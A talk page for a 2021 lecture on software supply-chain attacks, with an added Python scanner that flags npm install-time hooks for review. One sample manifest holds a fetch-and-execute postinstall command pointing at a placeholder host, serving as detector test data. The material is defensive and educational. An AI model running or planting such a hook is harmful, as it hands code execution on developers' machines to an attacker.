Attacking The (Software) Supply Chain: A Piece in Three Acts

By Achim D. Brucker.

Modern systems, ranging from (smart) IoT devices to enterprise software applications, are rarely developed "on the green field": modern developers are "composers" who build systems by combining existing solutions with their own developments. It is not uncommon for 90% of the final product to consist of third-party components.

On the one hand, these third-party projects speed up development. On the other hand, their use requires trust and care: with a few lines of code in an installation script, your development system can be pwned, or a small vulnerability in a dependency can be the root cause of one of the largest data leaks of recent years.

In this presentation, I will discuss, using real-world examples, the security threats of using software dependencies carelessly and provide recommendations that help to minimise this risk.
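The "few lines of code in an installation script" mentioned above refers to install-time hooks that package managers run automatically; npm, for instance, executes the `preinstall`, `install`, `postinstall` and `prepare` scripts declared in a dependency's package.json on the developer's machine during `npm install`. The following script is an added example, not part of the talk or of any project it discusses: it scans package.json manifests for such hooks and reports them so they can be reviewed (or blocked outright with `npm install --ignore-scripts`) before anything executes. The sample manifests and package names in it are constructed for the demonstration and do not correspond to real packages.

```python
"""Flag npm manifests that run code at install time.

Added example (not from the talk): npm executes the lifecycle scripts
preinstall/install/postinstall/prepare during `npm install`, so a single
line in a dependency's package.json runs arbitrary shell commands on the
developer's machine. This scans manifests, either from a directory tree
or from an in-memory mapping, and reports every such hook for review.
"""
import json
import os
from typing import Dict, List, Tuple

# Scripts npm runs automatically at install time. 'prepare' also runs on a
# bare `npm install` inside the package's own directory.
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Constructed sample manifests for the demo; these are not real packages.
SAMPLE_MANIFESTS: Dict[str, str] = {
    "node_modules/pad-helper/package.json": json.dumps({
        "name": "pad-helper", "version": "1.0.0",
        "scripts": {"test": "node test.js"},
    }),
    "node_modules/handy-utils/package.json": json.dumps({
        "name": "handy-utils", "version": "0.3.1",
        "scripts": {
            # Classic pattern: fetch and execute remote code on install.
            "postinstall": "curl -s https://example.invalid/x.sh | sh",
            "build": "tsc",
        },
    }),
    "node_modules/broken/package.json": "{ not json",
}

Finding = Tuple[str, str, str]  # (manifest path, hook name, command)


def find_install_hooks(manifest_text: str) -> Dict[str, str]:
    """Return {hook: command} for every install-time hook in one manifest."""
    try:
        manifest = json.loads(manifest_text)
    except json.JSONDecodeError:
        # A manifest npm cannot parse is worth a look in itself; report it.
        return {"<unparseable>": "package.json is not valid JSON"}
    scripts = manifest.get("scripts") or {}
    if not isinstance(scripts, dict):
        return {}
    return {hook: str(cmd) for hook, cmd in scripts.items() if hook in INSTALL_HOOKS}


def scan_manifests(manifests: Dict[str, str]) -> List[Finding]:
    """Report install hooks for an in-memory {path: manifest_text} mapping."""
    findings: List[Finding] = []
    for path, text in manifests.items():
        for hook, cmd in find_install_hooks(text).items():
            findings.append((path, hook, cmd))
    return sorted(findings)


def scan_tree(root: str) -> List[Finding]:
    """Walk `root` (e.g. a checked-out node_modules) and report install hooks."""
    manifests: Dict[str, str] = {}
    for dirpath, _dirnames, filenames in os.walk(root):
        if "package.json" in filenames:
            path = os.path.join(dirpath, "package.json")
            with open(path, encoding="utf-8") as fh:
                manifests[path] = fh.read()
    return scan_manifests(manifests)


if __name__ == "__main__":
    # Demo on the constructed manifests; use scan_tree("node_modules") on a real tree.
    for path, hook, cmd in scan_manifests(SAMPLE_MANIFESTS):
        print(f"{path}: {hook} -> {cmd}")
```

Run it against a freshly resolved `node_modules` before the first build on a new machine, or wire `scan_tree` into CI so that a newly added hook in a transitive dependency fails the pipeline; combined with `npm config set ignore-scripts true` as the default and an explicit allow-list of packages whose hooks are known and reviewed, this removes the install script as a silent execution vector.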

Please cite this work as follows:
A. D. Brucker, “Attacking the (software) supply chain: A piece in three acts,” presented at the CIISEC master class, Online, Feb. 17, 2021.

BibTeX
@Unpublished{ talk:brucker:ciisec-supply-chain:2021,
  author     = {Achim D. Brucker},
  date       = {2021-02-17},
  title      = {Attacking The (Software) Supply Chain: A Piece in Three
                Acts},
  abstract   = {Modern systems, ranging from (smart) IoT devices to
                enterprise software applications, are rarely developed "on the
                green field": modern developers are "composers" who build
                systems by combining existing solutions with their own
                developments. It is not uncommon for 90\% of the final product
                to consist of third-party components.
                
                On the one hand, these third-party projects speed up
                development. On the other hand, their use requires trust and
                care: with a few lines of code in an installation script, your
                development system can be pwned, or a small vulnerability in a
                dependency can be the root cause of one of the largest data
                leaks of recent years.
                
                In this presentation, I will discuss, using real-world
                examples, the security threats of using software dependencies
                carelessly and provide recommendations that help to minimise
                this risk.},
  eventtitle = {{CIISEC} Master Class},
  venue      = {Online},
  areas      = {security, software},
}